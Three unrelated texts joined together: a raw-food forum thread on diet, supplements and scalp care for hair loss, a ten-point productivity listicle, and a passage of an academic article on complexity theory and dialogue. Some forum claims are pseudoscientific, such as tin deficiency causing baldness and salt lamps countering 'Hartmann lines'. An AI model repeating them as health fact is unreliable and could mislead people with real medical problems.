into your scalp when you do your scalp massages (use it sparingly though since it is heavy and can get oily!). The other oils mentioned by others are good too – but definatley coconut oil – but it in your smoothies. You can even just take a tablespoon yourself. Oh, I would recommended Brazil Nuts. When people severely restrict their diets, it can catch up with them in ways like hair loss. Look at anorexics – many of them start losing their hair. The body considers the hair not really something that is necessary to keep the body alive and functioning so that is way it is one of the last things to get nutrition. Since you were heavy SAD, one of the things that some rawies experience when they go raw is hair loss but it eventually grows back – they think it is the bodies way of getting rid of old “SAD” hair. 
If you can, get a copy of David Wolfes “Eating for Beauty”. It is more of a guide but it suggestion of which raw foods and supplements you can take for hair. Thank you all so much for your response. I have started to include flax, avacados, seeds, nuts, and coconut butter into my diet a few months ago but maybe not enough? My GYN says its my brain telling my body that right now is not a good time to have a baby because it is a high stress enviornment. I am confused because I am not underweight I am 5’4 and 118lbs. Also, my hair grows fast but just so dull and thin. So could it be just stress or is it my diet? I will deffinately try MSM queenfluff I really appreciate the advice. lovetobenatural, you are not the only one. I almost have the EXACT same hair issue as you! I added MSM into my diet but I think its too soon to see any improvements in hair quality. Gosh, I remember how EVERYONE used to comment on my hair being incredibly shiny, thick, brown with a tint of gold in light…now, there’s no other word to describe it than lifeless. I am also 5’4 and…I haven’t checked my weight for a while. I think I am a little below you. For ME, the increase of fat intake, especially fax and flax oils didn’t help much. Maybe I wasn’t having enough? I have to admit though, my skin is reeeally good and people complement me about it alot. I just don’t know why my hair is missing all the vitality. I don’t have my period yet either. Got it once when I was 13 and then never again. Now I’m 17. Wierd huh? I hope I don’t sound like an attention-seeker, like “oooo look how beautiful I am!”. TRRRUST ME, I am far from that. But I just wanted to make a point that the greens, veggies, fruits, sprouts, raw fats (and/or MSM?) has been doing my skin wonders, but not my hair. queenfluff, has anyone mentioned yet that you should be some kind of a professional hair consultant type person? Or are you one already? You are very knowledgable and helpful, I might as well add wonderful! when it comes to hair topics!!!! Actually, I used to be a hair stylist which is why I know alot of stuff about hair.:) I went to beauty school and I have a degree in cosmetology but I don’t use it any more. I still know how to do hair though. I cut my bf’s hair and my own (and other people if they ask). So I guess I have always been “into” hair – trying to figure out how to get my hair to grow better and faster etc (I used to fry my hair out all the time when I did hair trying new colors and perms – I was my own guinea pig) so I am always reading and looking things up. Plus I used to be a product pusher myself so I know how those things work. Believe it or not, I don’t have the best looking hair either – it is on the thinner side ( probably diet related too – got thinner when I went veg and a little more when I went vegan and a little bit when raw – I am not 100% though) and I am getting some greys! Eek! I have some breakage and it is on the dry side. But I have gone up and down with bad hair and some hair loss issues so I know how it is to have hair crisises so I like to share with others what has worked for me and the knowledge I have. :) I think it is unfortunate that people get ripped off by buying all these expensive products that promise miracles.(and believe I have bought them too) and obviously don’t do anything. It is bad enough you are losing your hair, you don’t want to lose your money too! I learned something today that I didn’t know – for the MSM, make sure you get the OptiMSM. 
It is apparently the more purer form of MSM which is created by a distilling method. I wasn’t taking the MSM for a while and I finally went out and bought some today. And please make sure there isn’t any caking agents or other stuff like that in it – the company will use that as filler so they can give you less MSM. I bought the Vitamin Shoppe brand – 16 oz for 24$ – and it is the OptiMSM and there are no fillers. Oh also they have Organic Coconut oil – a huge bottle (29 oz) for 13$ – it is cold pressed so my bf says it is raw. Pretty good deal! Some more “food for thought” too – the only part of your hair that is “alive” is the part that is still in your head that you can’t see -meaning the hair you can see is dead – the alive part is in your follicle where the hair is created and grown – so for you to get the thickest and best hair you can, you need to do stuff to those follicles – which is why you need to get the nutrition inside to get good hair coming out. You can still use things to get the hair you can see looking nice too – but the hair you have outside the scalp is what you body produced in the follicles. So, if your hair doesn’t look great there, it didn’t get created properly inside – which is why it makes sense that have to have great hair you must grow it first! I will go through my Eating for Beauty book tonight and make a list of the foods mentioned by David Wolfe for good hair. I’ll post them when I am done (I need a refresher myself!). But don’t forget to do the scalp massages – those have always been “no fail” for me in growing hair. Circulation really is key – so exercise (stand on your head if you want too). My hair grew its best when I was working out everyday – and I don’t do that anymore so I know that is why my hair isn’t at isn’t best right now! Ok, I browsed through my book and got a list. This list is not exhaustive of course – there are plenty of other foods listed – I just put some examples. Also, many of the foods I put here and in the books have more than one of the important vitamins or minerals needed for great hair so you might be able to pick a handful of good ones and have all the important nutrients covered! Pretty much all these nutrients are needed in some supply for good hair: Sulfur – MSM, onions, radishes, hemp seeds, Aloe Vera (has MSM) Silicon – cucumber skins, nettles (good to use on your scalp and hair in juice form too – I have use this and it makes the hair really strong) Vitamin A – Arugala, carrots, Papaya (you need the vitamin A combined with the sulfur and silicon for good hair) Like I said list isn’t exhaustive and their may be other things you might need that you are deficient in too (biotin is said to be important for hair too but wasn’t really mentioned in the book – swiss chard, almonds and walnuts have biotin) Wow, queenfluff. I have been eating many things on that list and have lately noticed fewer grays and definitely thicker hair. I only use a little shampoo 1-2x a week, and lately have been putting jojoba oil on the ends while it’s still wet. It really adds a nice shine. lovetobenatural, MSM is an organic form of sulphur which is quickly lost when we cook our foods. Also, because of pollution in our atmosphere its harder to obtain naturally. Check out this link: http://www.davedraper.com/msm.html One other thing to consider is iron levels. This might also explain why you stopped having your period. My hair has thinned also, and when I went to donate blood I barely passed the iron test. 
Nettles have 3x the iron as spinach and it’s more absorbable also. You can buy them from health food stores already dried, or you can pick them and dry your own. Mine dried in about a day. Once they’re dry they can’t sting you anymore. Try to stick to the new growth through as I read that older leaves contain an irritant to the kidneys. Thanks for the list Queenfluff. I read the book but haven’t put it all together yet and don’t always eat enough variety. If I were to focus on certain things in the list – just based on what I know about hair – I would focus on the things with iron, MSM, zinc and protein (although David Wolfe says that what is normally referred to as a protein deficiency is really an MSM deficiency but he does mention protein in the book). You really need a combo of things to get good hair. Hemp seeds cover alot of the important nutrients. In fact, in the book the list of things that hemp seeds have is really long. I think they have all the minerals listed above and some other great ones too. They have sulfur, zinc, iron, manganese, silicon – the only one not on the list is selenium. They also have tin (david wolfe says a tin deficiency is responsible for male pattern baldness) and iodine – two other minerals that have been said to be important for hair. Raw Chocoholic – Good point about the iron – I have always been slightly anemic since I went veg. Iron is important. lovetobenatural – Just wondering if you have alot of stress in your life too? You mentioned “stressful environment”. Stress is one of the number one causes of hair loss. You may not notice the corelation. You have a super stressful time and it is over and than a month or two later your hair loss might increase. Also too just wanted to mention (so you don’t get discouraged), that it can take a while to recover from hair loss – if you have been deficient in many thing for a long time, it can take a while to build up those deficiences and as such it can take just as long to recover from them. Definatley keep up your new regime for more than three months. I would look for improvement at around six months. Darn it! I am very VERY stessed out, personally. In fact, I visited a doctor back in..january I believe, because of these really bad upper stomach pains and he told me I have dypepsia due to chronic extreme stress (I’m still recovering from a really bad trauma, worse than you can ever imagine in your entire lives! Worse, but I’m not ready to share it. Still keeping it inside, keeping all the pain to build up in me, thus, dypepsia). So there’s MY answer to my hair problem. Thank you for pointing it out Queenfluff! And thanks for the nutritions tips!!! On this site, I consider you the hair expert! I think there is a direct correlation between my hair thinning, loss of my period, and the amount of emotional stress I have been under. This being said, I am confused if this is something I can correct through nutrition or if I have to reduce the stress, which I am not sure how to do. Samilicious, did you notice your hair problems arose after your stress levels increased? lovetobenatural – Yes, you can correct this. The thing is that stress depletes nutrition. You could have been eating everything good for your hair, taking MSM, doing scalp massages etc – the works – if you were very stressed out, that would trump it all. So, if your stressful period is over, you can now start over again. But at this point it doesn’t matter whether your hair loss is from stress or bad diet. 
Either way your body is deficient right now so start on getting the right things in you. But also, stress reduction is part of the regime – if you have too much stress (not talking everyday stress – unless you have problem controling that too – but major stressful life events) and dont get it under control, it will hard for your hair to recover. If you are in a constant state of high stress for a long time, yes, you can suffer hair loss from that. One thing you might want to check out is your scalp: does your scalp feel tense? Is it normally like that? Having a tense scalp can be a sign of stress – this is bad for the hair in the way that the tension in your scalp can reduce the circulation to the follicles. Scalp massages (esp if you use an electric one) can definately help with this. When my scalp gets tense the electric scalp massager really helps. Gets rid of headaches too! :) Just do a search for stress and hair loss – you will tons of articles on it. lovetobenatural, yes, I’m pretty sure there is a connection there. Even for my non-raw dad! He has been under SO much stress through most of his life and he is nearly 45 years old and mostly bald. I’ve seen others his age with WAY more hair then him. He has been this bald since I was pretty young, but recently when I started forcing him to try some of my morning green smoothies, he has little bits of hair growing (he is also less stress now)! Also, I don’t know if this is the case for you but I am confident that the weather plays a huge role in contributing to my depression. Especially during winter time, I’m in an aweful mood. And then when I’m in the sun, all of a sudden I feel this eruption of happiness and relaxation spread through me. I don’t know how to describe it but it feels so good to be in the sun! I thought of getting some vitamin D supplements but spring is here and the weather should be getting warmer so I thought I’ll leave it until next fall. In addition, sunflower seeds are a good source of vitamin D (but I don’t have it often enough), and there is the spectrum light bulbs that you can use instead of regular light bulbs that are supposed to be good because they mimick sunlight and many claim they are effective (lasts longer and saves more energy than regular light bulbs too!) I wish there was cure for stress but there isn’t. Its all up to us… Samilicious, When I was not raw this much I used to have the same problem winter time.However it might can be related to the stress of exams too. My best ideas against depression is exercise, aromatherapics oils, hot bathes, I have a salt lamp, its light is really nice and it sends negative ions to the air, which is very good against the harmful earth radiation, eg Hartmann lines wich surrounds us. im gonna chime in on awhim..lst time i went to the stylist she said my hair looks better than it ever ahs since she has been doing my hair like 7 years….granted i swam a ton for most of those years and now rely on yoga and biking instead( chlorine started to affect me negatively and im to chicken shit to swim in the ocean! ;) any how the two new additions to my diet since my last appointment have been daily kombucha and hemp seeds (only a tablespoon of those)my hair is long and its abused regularly in the sun, and with highlights….. jsut my two cents worth Stock up on red bell peppers, brazil nuts, and MSM. These foods are all very high in sulphur and will help to build up your hair and nails as well as rejuvenate your skin. Also try to consume avocados and flax seeds or flax oil. 
like flybaby stated above. God bless! I just have to say, there is a remedy for stress. There are calmers like lobelia and kava kava but for me what really worked was a supplement from Gaia herbs for adrenal fatigue, When we stress, our adrenals release cortisol and other feel good chemicals, over time our adrenals become depleted. This supplement has rhodiola, holy basil, ashwaganda, wold oats and schisandra. I started laughing-alot more and alot longer than ever before. I felt a new sense of calm I hadn’t experienced, like I could ride the waves instead of geetin’ all streesed out about every little thing! Highly recommend it! If you do green smoothies, I would do the greens that have the thing you need for the hair – like spinach. I don’t eat any blended greens at all. I don’t like green smoothies. Honestly, I haven’t really noticed that rawies who are into green smoothies really have any better hair than people who don’t do green smoothies. I thought I would bump up this topic to see how everyone is doing with their hair loss. I for one am still having problems. I am currently eating 2 to 3 tablespoons of hemp seed and am taking 1 tablespoon of Vitamineral Green daily. I also bought John Masters Deep Scalp Follicle Treatment & Volumizer for Thinning Hair in addition to trying a new supplement, GNC’s Women’s Ultra Nourishair. I just started using these products so it is way too early to notice any difference. Nuttgirl – I know you might not want to hear this but you are wasting your money with the some of the products you are buying. I have used products similar to that john Masters products before in my life too and I can tell you they don’t work. You want good hair you have to grow it. The ingredients in the John Masters products aren’t all that bad except it is mostly water and glyercin. There are lots of herbs in there that are good for hair. But honeslty you would be better off buying these bulk and drinking them as a tea or making a rinse out of them and massageing it into your scalp. It is always best to have these things at full strength and not diluted in the mixture. I am not a big supporter of vitamins for hair (and I used to take those hair vitamins ALL the time – I had rows of them on my dresser!) because I have come to realize that to get your vitamins and nutrients from your food is the best source of them. The only supplement I take is MSM. I am starting to develop some natural herbal products for hair including a hair tea which I will be selling soon. Look for post in the Other section when they are ready for purchase. If you haven’t been doing it, start doing scalp massages. Getting circulation up to your scalp is really important and honestly in all my years of trying to get my hair to grow it has been the one thing that always works when I go back to it. I am not sure of your hair condition and your lifestyle (do you have alot of stress?) but hair loss can be a combo of many factors. Keep your stress down, eat raw foods that are good for hair, get your massages in and keep your hair in good shape (if you hair is fragile and damaged, your hair will continue to fall out – get a good trim or cut a lot of it off). I greatly recommend eat to eat raw food, sleep LOTS, reduce stress. Don’t use shampoo or any products at all. Don’t use a hair dryer or hair styler of any kind. Air dry your hair – it’s key! My hair is gorgeous when i follow all these requirements. The Rawtarian Community The Rawtarian Community is one of the largest online raw food communities. 
null
minipile
NaturalLanguage
mit
null
Procrastination frankly just feels good ... right up to the minute when we recall that we really must get things done. That's when it gets ugly. All of us hop into ninja mode and then scramble around until everything gets accomplished--of course, half-heartedly. Then we vow to ourselves that we'll never procrastinate again. But, deep inside, all of us know it'll happen repeatedly. It is a vicious pattern, and it won't stop unless we break it ... by becoming productive. Here are 10 productivity tricks successful people use.
1. Wake up earlier. If you rise one hour earlier than usual each day, you will be shocked at how much you will get accomplished in a week. Additionally, rising at the same time each day stabilizes your circadian rhythm. Having a circadian rhythm that is steady allows you to become more productive during the daytime because you will be energetic and alert.
2. Create a list. Few things are more satisfying than crossing an activity off the to-do list. It is tangible evidence that you truly got something accomplished, and it may motivate you to tackle your whole list in a day.
3. Take baby steps. Did you ever put a task off only to find out, when you finally got around to it, that it took just 10 minutes to do? A task, oftentimes, seems more daunting than it really is. Rather than telling yourself that you must do five loads of laundry before tomorrow, concentrate on just separating your laundry--a chore which is quicker and easier. Once you get all of the laundry separated, say, 'Now it is time to toss the whites inside the washer.' When the whites are finished, concentrate on putting them into the dryer and the towels into the washer. Concentrate on every step, and soon enough, all five loads will be washed, tumble dried, folded, and put away.
4. Consume your broccoli first. If you eat your broccoli before consuming anything else on your plate, you are getting past the most dreaded portion of dinner so you finally can relax and appreciate everything else. Apply this philosophy to other aspects of your life as well. If you do the most difficult task first thing in the morning, you'll alleviate yourself of stress and better appreciate the remainder of your day.
5. Beat the clock. You can play a game: Try to beat the clock! Set a timer for 50 minutes and accomplish a task with complete concentration. When that time is up, take a 10-minute break. Start working again for 50 minutes, then take a 10-minute break. Repeat this cycle until everything is completed.
6. Voice commitments. A vow to yourself is a lot easier to break than one you have given to somebody else. You are more likely to get something accomplished if another individual holds you accountable. Locate an entrepreneurial buddy to monitor your progress as you start a business.
7. Remove all temptations. Checking your Facebook alerts and reading a text might seem like a harmless action that takes no more than five seconds, but doing this really snaps you out of your zone of concentration, which will take you a while to get back into.
8. Enforce the five-minute rule. If an activity takes five minutes or less to finish, do it immediately. This rule is particularly great for responding to emails or washing the dishes. When faced with an activity, instantly ask yourself if it will take five minutes or less to accomplish. If so, do it!
9. Trap yourself. If all else fails, it is time to leave yourself without any option. This means taking drastic measures to make yourself finish a task. For instance, if you have to change your car's oil, have somebody lock you out of your home until your car's oil pan is put away and clean.
10. Accept that you're just human like everyone else. Know that nobody is perfect and you will not be rejected for not flawlessly performing a task. When faced with a challenging activity, tell yourself, 'I am only human, and it is all right to make a mistake.'
null
minipile
NaturalLanguage
mit
null
Authors The complexity revolution that emerged from the work of Lorenz (Gleick, 1988), Prigogine (Prigogine & Stengers, 1984), and many others has certainly spread into management and organizational theory, with implications for economics (Arthur, 1994), human development (Senge, 1990), and organizational theory (Wheatley, 1992). Communication scholars have also recognized a tremendous explanatory potential in complexity (Anderson & Houston, 1997; Hammond, 1997; Hawes, 1999), while noting its limitations (Woods & Simpson, 2002). With this increased scholarship has come greater debate on how complexity and self-organization work within social situations. As Woods and Simpson (2002) have asserted, creating working explanations is problematic. Some frustrated social scientists (Letiche, 2000: 58) have called the complexity paradigm “messy.” Axelrod and Cohen (1999: 15) say, “there is little convergence among theorists who have begun to study complex systems as a class. It is not a field in which a crisp and unified theory has already been developed, nor is one expected in the next few years.” In addition to concerns over the instrumentality of complexity theory, as the paradigm matures and penetrates deeper into each discipline the conversation between disciplines seems to diminish. As a result, important conceptual breakthroughs in one area go unnoticed by another. This article makes two important contributions. The first is to build a conceptual two-way bridge between those who are concerned with communication in scientific disciplines and those who are concerned with communication from social scientific paradigms. Building this conceptual bridge leads to an important redefinition of communication focusing on dialogic processes that lead to social self-organization rather than linguistic processes that lead to a rhetorical destination. Implied in this redefinition is a position that self-organizing systems must define themselves, describe themselves, mark the common ground of order and disorder, and then redefine themselves. Our redefinition toward a process orientation of communication lays the foundation for the second section where we examine the implications of this new definition and identify five different “attractors” around which communicative selforganization occurs. Thus, we show how complexity “works” through dialogic means to create social self-organization in organizational environments, extending our understanding of dialogue “as a way of interacting that facilitates the construction of meaning” (De Weerdt, 1999). REDEFINING COMMUNICATION IN COMPLEXITY TERMS We can redefine communication from two directions. The first is from the scientific complexity paradigm, where we will show how those who describe self-organizing processes redefine communication by arguing that it is a nonreversible and nonpredictive process that is essential for self-organization, defining and confining the social organization to certain structurating possibilities. The second direction is from communication theory, where we will note how some communication scholars have redefined communication in ways that align with scientific complexity concerns. Both the scientific and communication approaches to complexity point toward a dialogic view of communication that is best explained by the principles of self-organization. Of course, the very term “self-organization” has multiple meanings. 
But communication defined in the self-organizing frame suggests that a system is in an ongoing dialogue with itself in order to define itself, describe itself, mark common sites of order and coherence, mark common sites of disorder and incoherence, and redefine itself. SCIENTIFIC COMPLEXITY AND COMMUNICATION We do not intend to provide an exhaustive literature review of the many contributions that scientific theories of complexity have made toward a redefinition of communication. We are also limited in our review of the scientific literature, focusing mainly on ideas accessible to social sciences. We do, however, want to highlight four critical points coming from complexity science that tear communication from its previous linear paradigm (Carey, 1989) and center its function within complex systems. Scientific theories have shown that communication is nonreversible, nonpredictive, fundamental for self-organization, and system defining. Communication is non-reversible Traditional, rhetorical views of communication popular through the nineteenth and twentieth centuries suggested that communication was a bipolar process that allowed one person to target another, convince the other of their rightness, and then enjoy the power of their persuasive role. If someone “changed their mind,” the rhetorical process was reversed and they were reconverted to the old position. Entire institutions, parliaments, and legal systems were founded on this linear notion that is based on a distinguishable dualism between self and other. During the nineteenth century, the final state of thermodynamic evolution was at the center of scientific research. This was equilibrium thermodynamics. Irreversible processes were looked down on as nuisances, as disturbances, as subjects not worthy of study. Today, the situation has completely changed. We now know that far from equilibrium, new types of structures may originate spontaneously. All communication has an element of the spontaneous. Even a carefully scripted television program can have spontaneous meaning as it is watched in different social and cultural contexts by viewers with different values. Whatever meanings are made go forward and cannot be erased. Communication is non-predictive The spontaneity described by Prigogine comes about as a result of the inherent randomness in any complex system. It is the tension between disorder created by randomness and order imposed by shared meaning and experience that creates the need to communicate. Crutchfield (1986: 46) said that the idea of self-organization within the complexity paradigm “implies new fundamental limits on the ability to make predictions. On the other hand, the determinism inherent in chaos implies that random phenomena are more predictable than had been thought.” In other words, we communicate to find meaning and create order in an equivocal world, but our communication processes create disorder at the same time. Cohen (2002) describes a similar tension in biological systems. Communication is fundamental to self-organization Cramer (1993) argues that self-organizing communication is not a property merely of living structures but of all structures. He says that the randomness brings limited agency to all structures and that “true selforganizing is a property of the entire system” (Cramer, 1993: 171). Cramer’s argument is holistic and implies a material realization that a dialogic information exchange is a central part of self-organization, and that the only real dualisms are symbolically created. 
The assertion that self-organization is a fundamental property of matter means, at the same time, that this is a priori filled with ideas. It carries within it the idea of its self-organization, its self-realization, all its blueprints and physical manifestations. Accordingly, the idea of human consciousness must have existed as a possibility at the very moment of the big bang. From this point of view, there is no opposition between spirit and matter. In any case, spirit cannot have arisen as a super-structure from matter. The opposite is more likely; a matter devoid of ideas, without the idea of self-organization, does not exist, any more than weightless matter exists. (Cramer, 1993: 172) Communication is life giving and system building Cramer’s notion that consciousness and self-organization (and thus communication) are essentially life giving is shared by other scientists. Complexity biologists like Varela (1987) have suggested that information is life giving and that the movement of information, or communication, is essentially life itself. Information not only informs the other, but it creates the self. Self-reference, according to complexity biologists, is the essential life-giving outcome of communication. This moves biology to a broader and more holistic view of life, articulated by Botkin (1990: 7): We are accustomed to thinking of life as a characteristic of individual organisms. Individuals are alive, but an individual cannot sustain life. Life is sustained only by a group of organisms of many species—not simply by a hoard or mob, but a certain kind of system composed of many individuals of different species—and their environment, making together a network of living and non-living parts that can maintain the flow of energy and the cycling of chemical elements that, in turn, support life. Note that while many of these scholars infer new characteristics, they do not directly address communication. They describe the critical function of networks, information sharing, and talk about self-consciousness and self-reference. They describe the flow of energy and the flow of information. What Wheatley (1992: 105) described is certainly well within the domain of communication: Information is unique as a resource because of its capacity to generate itself. It’s the solar energy of organization—inexhaustible, with new progeny emerging every time information meets with itself. As long as there are senders and receivers linked together in a context, fertility abounds. All that is needed is freedom of circulation to guarantee new births. THE CONTRIBUTIONS OF COMMUNICATION SCHOLARS Simon (1962) is the first known reference in communication literature to self-organization. While many communication scholars argued for a more nonlinear approach drawing from cybernetics and second-order cybernetics (Krippendorff, 1994), it was not until the late 1980s when the ideas from science began making their way into mainstream communication theory. Communication scholars, friendly to the ideas of the new French philosophers (Deleuze & Guittari, 1987; Latour, 1988), first found the vocabulary of complexity helpful in rethinking communication (Anderson & Houston, 1997; Hammond, 1997). Later, some communication scholars went beyond drawing mere conceptual distinctions to using complexity in research designs and in making broad philosophical claims (Hawes, 1999). 
We are now at a point where we can begin to see how the ideas of selforganization inform our understanding of our most obvious environment: our social interactions. The redefinition of communication in complexity terms features that abandonment of the traditional, rhetorical view of communication as persuasion. It also forces a repositioning of the sensemaking (Weick, 1995) paradigm, where communication reduces equivocality. The complexity paradigm in communication sees the communicative act as a source of both order and disorder present in all systems. Indeed, Luhmann (1984) claims that communication is the medium of all systems. Taylor (2001: 149) explains that Luhmann argues that “the common tendency to see communication as a consequence of one person acting and another reacting is to invert the real relationship between action and communication. It is not action that produces communication. Only communication can produce action.” Luhmann (1992: 251) states, “only within such a network of communication is what we understand as action created.” Following Luhmann’s idea that action does not produce communication, Baraldi (1993) explains that in this perspective, communication must be seen as the process of creating continued communication. In addition, Hammond (1997), influenced by the scientific paradigm, claims that communication cannot be separated from the system itself. Thus, communication produces the interdependent interaction in a system, rather than the interdependent interactions producing certain types of communication. And consequently, communication continually sustains and reproduces the system. “Communication is self-regenerative. In other words, one thing leads to another, to produce sustained interaction” (Taylor, 2001: 149). In simple terms, communication theory is moving from a simplistic persuasive model based on a transmission metaphor, to a new set of framing metaphors and theories based directly or indirectly on complexity. Communication is no longer seen as a rhetorical destination but as a process shared within a social system. Some scholars are beginning to recognize this need to understand communication as the basis of all systems, and specifically self-organizing systems, and to call for scholars to begin uncovering the specific communicative processes by which self-organization in complex systems occurs. Salazar (2002), in discussing self-organization and the generation of group creativity—creativity being a salient issue for complexity scholars, such as Coleman (1999)—claims that there is a need to identify the characteristics of group adaptation in fluctuating environments, “as well as identifying the initial conditions that give rise to system features that enable creative activity” (Salazar, 2002: 180). Dooley and Van de Ven (1999) point out the limitations to current thinking about the complexity perspective, arguing that there is too much emphasis on the implications of complexity and that scholars are overlooking the need to uncover the mechanisms that generate it. Menz (1999: 107) explains, “If communication really is the medium of all systems (Luhmann, 1984), then self-organization must above all constitute itself by and be identifiable through specific processes and forms of communication.” He claims, “we need to inquire into the specifics of self-organizing communication and examine its defining characteristics.” And Salazar (2002) calls for communication scholars to actively become a central part of this defining process. 
Luhmann (1992: 251-2) explains that to begin this defining process, “one must not begin with the concept of action, but with the concept of communication.” Making the claim that communication is the medium of all systems, especially social systems (Luhmann 1984, 1992), an analysis of some of the many definitions of complexity and self-organization will reveal their underlying communicative assumptions that support this claim. Although these definitions are common understanding among complexity scholars, reevaluating them from a communication perspective will illuminate the communicative nature of complexity and self-organization. DIALOGUE AS SOCIAL SELF-ORGANIZATION: FIVE POINTS OF ORDER AND DISORDER It is often difficult to see how self-organization “works” dialogically within social systems through the communication process because selforganizing occurs in real-time relationships that surface and submerge in our perceptions. Some work has already occurred in this area. According to Axelrod and Cohen (1999), three key terms describe the complex framework of self-organization in social systems: agent, strategy, and population. Agents use strategies to understand and exchange information with a larger population of agents. These agents adapt to their environment as it changes, select which information is necessary to interpret, and interact accordingly to try to bring order to their situations. In other words, Axelrod and Cohen say, people, embedded with identity, communicate with other members of their organization as they make meaning around new phenomena and hope for a specific outcome. They do this in order to keep up with constant challenges and continued change. These people communicate individually or collectively about those things they encounter in their organization that are pertinent to their surroundings, trying to keep up with the constant changes in the organization and the field of the larger economy that surrounds it. An “economy,” as described by Axelrod and Cohen, is a dynamic, selforganizing system. According to Cramer (1993), there must be two elements. The first is a tension, difference, misunderstanding, or underdetermination where meaning is in dispute. It is only when we don’t understand one another that we find the need to communicate. The second is an attractor, domain, or field that binds our social system. An attractor is like a domain, constrained by an underdetermined, fixed point with definable boundaries but unlimited internal possibilities. For example, the weather has definable boundaries. The temperature will never reach 150 degrees Fahrenheit, nor will the wind blow at 200 miles per hour in any weather pattern, but within a weather pattern there are infinite possibilities for wind direction, duration, and other measures. There are enough patterns that prediction is a hope, though never a complete possibility. Cohen and Stewart (1994) describe such an attractor, where they suggest that a realistic portrait of predator-prey dynamics must include both an attractor and a repeller. All populations live within the tension between these two boundaries. If the prey becomes too populous, it allows the predator population to grow, who in turn kill more prey. About these population dynamics they say, “Attractors are the things that the dynamics converge toward if you wait long enough; but once they reach the attractors, they diverge again” (Cohen & Stewart, 1994: 206). 
From our observations of real-time dialogues and assessment of the literature, we believe that certain tensions are present in every dialogic encounter, and that they cluster around certain attractors. These form permanent questions that are always before us in dialogic situations. These questions may be subtle or direct, clear or unclear, obvious or opaque, but they are ever present in social self-organization. In other words, they are always part of the dialogue. It is clear that our list is not exhaustive, nor are our examples undisputed. These tensions, although not always obvious, are layered within the dialogue and subjectively experienced. They are “once-occurrent events of Being” (Bakhtin, 1993; Shotter, 2000) that can be subtle, elusive, powerful, clear, disputed, disruptive, revealing, and even transformative. They are always in dispute and thus are the rhetorical artefacts of social self-organization. As participants engage one another in dialogic encounters in organization, they enter into a nonreversible field similar to that described by Prigogine (Prigogine & Stengers, 1984) or Hayles (1988) that opens possibilities for change in communicators, their identities, the group, the meaning, and so on. It also opens the possibility of our own confusion. Shotter (2000), in a point very similar to those made by Prigogine and Hayles, cautions us about the problem with this kind of scholarship when he says that we are attempting to characterize a flow while we ourselves are in the current: “Our everyday ways of communicating and understanding each other from within this flow are not best understood by being viewed through the refined and systematized products that emerge from our more everyday, informal modes of communication” (Shotter, 2000: 121). He argues that it is extremely difficult to move “upstream” and make systematic observations about the “special moments” when we are in “an immediate living contact with each other” (Shotter, 2000: 121). The task is indeed difficult, but if we are to adopt the complexity paradigm and use it to describe how this “works,” we must learn to live with this difficulty. We describe each of these observed tensions as just that: tensions that vary in relative significance throughout the process of the self-organizing dialogue (see Table 1). These five tensions were originally developed by Hammond, Anderson, and Cissna for a forthcoming article, “The problematics of power in dialogue,” in Communication Yearbook, Vol. 27. They have been expanded for this article to include a link to issues within complexity theory. Note that the social issues of identity, outcome, meaning, voice, and field are linked to complexity issues that point toward self-organization.
Table 1 The social issues in dialogue
Social issue   Tension                        Self-organization
Identity       Self and other                 The system defining itself
Outcome        Content and process            The system describing itself
Meaning        Coherence and incoherence      The system marking disorder
Voice          Monovocality and mutuality     The system marking order
Field          Convergence or emergence       The system redefining itself
THE SOCIAL SYSTEM DEFINING ITSELF THROUGH A DIALOGUE ABOUT IDENTITY
The first permanent tension in dialogue concerns the relation between self and other and falls under the label of identity. In a social system that is self-organizing, the communicative function of self-definition is always at play. In communication literature the label is identity, both individual and corporate (Burke, 1968).
Communication, philosophy, literary theory, and psychological theories often suggest that self-knowledge and identity construction are possible only through the process of social interaction. Burke described identification not only as the process of distinguishing one’s self from others but as the coequal process of creating a relationship with others. He argued that the formation of identification is what separates humans from animals. Deleuze (1990) believed that all communication begins with “I,” and that the individual is always comparing their central material condition with others. Buber (1958: 28), however, claimed that “Through the Thou a man becomes I.” He says that the tension between the self and the other leads to reflexivity, self-reference, and self-implication. This is the tension that calls the individual to enter into a social relationship through dialogue. The negotiation of self-identity and group identity is both a motive for and a product of dialogue. Identity is continually negotiated between the individual and the whole. The tension between self and other is therefore essential for communication and self-organization to occur, lending credence to those who believe that diversity defined in any terms (intellectual, cultural, racial, gender based, etc.) is essential for healthy dialogue. It also suggests that questions that negotiate difference, such as racism and sexism, are permanent. But how does this “work” in dialogue? Organizational development consultant Marvin Weisbord (1992) seeks participants in his designed dialogues who will ask probing identity questions. He says that stakeholders who are concerned with their relationship to the group lead group members to question their own assumptions. To innovate and lead the group in new directions, says Weisbord, group members must come to see themselves differently. Simply put, new identities create new forms of organizing and different outcomes. THE SOCIAL SYSTEM DESCRIBING ITSELF BY CREATING CONTENT AND PROCESS BOUNDARIES Different cultures define the process and content boundaries for dialogue differently (Kincaid, 1987). This is particularly true when defining what one might suggest is the starting point for dialogue. Hammond (1997) found that structured dialogues in culturally complex groups contain language that negotiates both content and process, but that one usually dominates at different points during the dialogue. For example, in some Asian cultures process must be made explicit before issues of content can be raised, while in some European cultures the content issues must be made explicit before issues of process can be discussed. These differences suggest that while the dialogic tension between content and process is permanent, it is also essential for social self-organization to occur. Hyde and Bineham (2000) distinguished between content-privileged dialogue and process-privileged dialogue. The first, Dialogue1, binds participants to specific practices and presumes that they will engage in active listening and participative decision making across their differences. The success of this kind of dialogue can be determined by how well the participants address content issues. Dialogue2 is less predictable, less driven by content, and is process oriented. It engages us in unpredictable processes of self-implication, communing, and flashes of self-other insight. One way to think about this distinction is to consider what facilitators can do to help dialogue develop. 
In Dialogue1, facilitators teach skills such as active listening, for example, increasing the likelihood of careful consideration of positions among communicators. In Dialogue2, facilitators might primarily think of their task as clearing a space within which moments of dialogic encounter or insight might emerge with as few obstacles as possible. In either case, the tension between content and process leads to communicative behaviors that unite and divide the group around process orthodoxy and content outcomes. Groups socially self-organize as the dialogue leads them to consider what they want to do and how they want to do it.

THE SOCIAL SYSTEM MARKING ORDER WITH THE TENSION BETWEEN COHERENCE AND INCOHERENCE

